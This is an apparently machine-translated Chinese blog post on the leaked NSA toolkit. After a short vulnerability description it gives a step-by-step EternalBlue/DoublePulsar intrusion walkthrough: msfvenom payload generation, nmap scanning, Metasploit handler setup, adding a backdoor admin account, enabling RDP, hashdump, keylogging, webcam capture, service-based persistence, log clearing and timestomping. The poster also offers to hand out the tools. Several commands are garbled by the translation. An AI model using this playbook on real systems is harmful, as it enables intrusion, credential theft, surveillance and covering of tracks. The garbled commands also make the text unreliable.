美国国家安全局(NSA)的黑客武器库被泄露,其中许多人远程攻击Windows。
该系统的武器已经在网上公开,任何人都可以用NSA的武器攻击其他电脑。
NSA武器库的披露被称为网络世界的“所有恐惧的总和”,其中有十个影响个人Windows用户的黑客工具,包括永恒之蓝、永恒之王、永恒浪漫、永恒协作、翡翠纤维、怪异地鼠、爱斯基摩卷、温柔学者、日蚀之翼和尊重审查。这些工具可以远程攻破全球约70%的窗户。
该系统不需要任何用户操作,只要联网就可以入侵电脑。就像冲击波、震荡波等著名的蠕虫病毒一样,可以瞬间横扫互联网。木马黑产很可能改造NSA的武器来攻击普通网民。
最近席卷全球的电脑勒索软件WannaCry就是利用永恒之蓝传播的!
永恒之蓝是NSA网络武器库民用的第一个例子。它会自动扫描Windows的445文件共享端口。
Machine,不需要任何用户操作,就可以加密锁定所有磁盘文件,后缀变成。洋葱。随后,黑客可以远程控制木马,向用户勒索“赎金”。其原理是SMB 0day漏洞攻击,大大增强了其成功传播的概率!
接下来我就来分析一下这个泄露的美国黑客武器库,进行技术分析!
1.NSA Eternalblue(MS17-010) SMB漏洞攻击原理分析
Microsoft安全公告MS17-010-严重
Windows SMB服务器安全更新(4013389)
如果攻击者向Windows SMBv1服务器发送专门设计的消息,该漏洞可用于远程执行代码。多个Windows SMB远程代码执行漏洞
当Microsoft Server Message Block 1.0(SMB v1)服务器处理某些请求时,存在多个远程代码执行漏洞。成功利用这些漏洞的攻击者能够在目标系统上执行代码。
为了利用此漏洞,在大多数情况下,未经验证的攻击者可能会向目标SMBv1服务器发送专门设计的数据包。
Eternalblue是一个RCE漏洞,通过SMB(服务器消息块)和NBT(TCP/IP上的NetBIOS)影响Windows XP、Windows 2008 R2和Windows 7系统。
该漏洞发生在:c:\ windows \ system32 \ drivers \ SRV . sys。
注意:srv.sys是Windows系统驱动程序文件,是微软默认的信任文件。
漏洞函数:unsigned int _ _ fastcallsrvos 2 feat ont(int a1,inta2)
触发点:_ memmove (V5,(const void *)(A2+5+*(_ byte *)(A1+5)),*(_ word *)(A1+6));
其实漏洞刚出来的时候,基本可以干掉70%的外网窗口。
服务器。到这个时候,根据我的内网测试结果,我可以秒杀90%的Windows内网服务器。既然勒索软件利用了这一点
漏洞疯狂传播,所以现在很多内外网服务器都被封了!一些不思进取或者水平不高的中国网络或者服务器管理者是这样想的。如果没有问题,他们也不会想到提前防堵!结果得不偿失!
2.演示模拟攻击过程。
自动攻击,可以直接使用“构建自动攻击任务工具”加载NSA美国黑客武器库攻击模块来执行。
将NSA工具包中的windows文件夹解压到攻击A的C:\目录下(只要不是中文目录);
01.首先,在攻击机器a中安装:
python-2.8.6.msi
pywin32-621.win32-py2.8.exe
02.然后,在进攻b中产生反弹连接的x86bind.dll
msfvenom -p窗口
/meter preter/bind _ TCP LPORT = 8888-f dll gt;x86bind.dll
03.然后在端口445打开的情况下扫描活动主机,并探测操作系统。
nmap -Pn -p445 -O
nmap -Pn -p445 -O -iL ip.txt
04.使用攻击机器A开始永恒蓝色攻击
Python fb.py
使用永恒蓝色
05.使用Doublepulsar注入dll-使用Doublepulsar
06.Kali Linux2.0攻击机使用msf连接回控制主机5555端口。
使用漏洞利用/多重/处理程序
设定有效负载窗口
/meterpreter/bind_tcp
设置LPORT 5555
设置RHOST XXX。XXX.XXX.XXX
剥削
3.就拿Shell后期的任性攻击渗透来说。
01.您可以将主帐户添加到管理组以获得管理权限。
网友sherly sherly/add
net本地组管理员sherly/add
02.设置端口转发并打开任何端口。
如果端口3389仅限于intranet访问,您可以使用portfwd将端口转发到本地连接。
港口前进地址-l 8888 -p 3389 -r XXX。XXX.XXX.XXX
rdesktop-u root-p toor 127 . 0 . 0 . 1:8888
打开远程控制端口3389。
wmic/namespace:\ root \ CIM v2 \ terminal services path win32 _ terminalservicesetting其中(__CLASS!= " ")呼叫
setallowtsconnections 1
wmic/namespace:\ root \ CIM v2 \ terminal services path win32 _ ts general setting where(terminal name = ' RDP-Tcp ')调用
setuserauthenticationrequired 1
REG add " HKLM \系统\当前控制集\控制\终端服务器"/v fSingleSessionPerUser/t REG _ DWORD/d 0/f
03.进一步嵌入meterpreter自带的多功能外壳。
附带的命令如下:
Hashdump:获取用户密码的哈希值,可以用ophcrack等彩虹表工具破解。
截图:打开获取截图。
网络摄像头_snap:打开对方的摄像头拍照。
Keyscan_start,keyscan_dump:开始记录键盘动作。
Ps:显示当前运行的进程。
Sysinfo:显示系统信息
Getsystem:系统提升权限
4.进行持续控制。
Migrate:将meterpreter会话移动到另一个进程内存空空间(migrate pid)以供ps使用。
Irb:与ruby终端交互,调用meterpreter封装函数,可以添加Railgun组件直接与本地Windows API交互,防止目标主机进入睡眠状态。
IRB client . core . use(" rail gun)client . rail gun . kernel 32 . setthreadexecutionstate(" ES _ CONTINUOUS | ES _ SYSTEM _ REQUIRED ")
后台:隐藏在后台方便msf终端的其他操作,会话可以查看会话ID;Session -i X:使用已经成功获取的对话。
5.邪恶被植入了后门的后门
检查虚拟机是否:
运行post/windows/gather/checkvm
作为系统服务安装:打开目标主机端口31337上的监控,使用metsvc.exe安装metsvc-server.exe服务,运行时加载metsrv.dll。
运行metsvc
打开远程桌面的Getgui:
运行get GUI-u sherly-p sherly
运行multi _ console _ command-RC/root/. ms F3/logs/scripts/get GUI/clean _ up _ XXX . RC
清除入侵痕迹-清除痕迹,关闭服务,删除和添加帐号。
Clearev:清除日志
Timestomp:修改文件的创建时间、上次写入时间和上次访问时间。
timestomp xiugai.doc -f old.doc
就这样,我可以来回穿梭,不留痕迹。我悄悄的走了,正如我悄悄的来;我挥一挥衣袖,没有带走一片云彩。
PS:如需工具,请回复评论,稍后我会补上工具地址!谢谢你
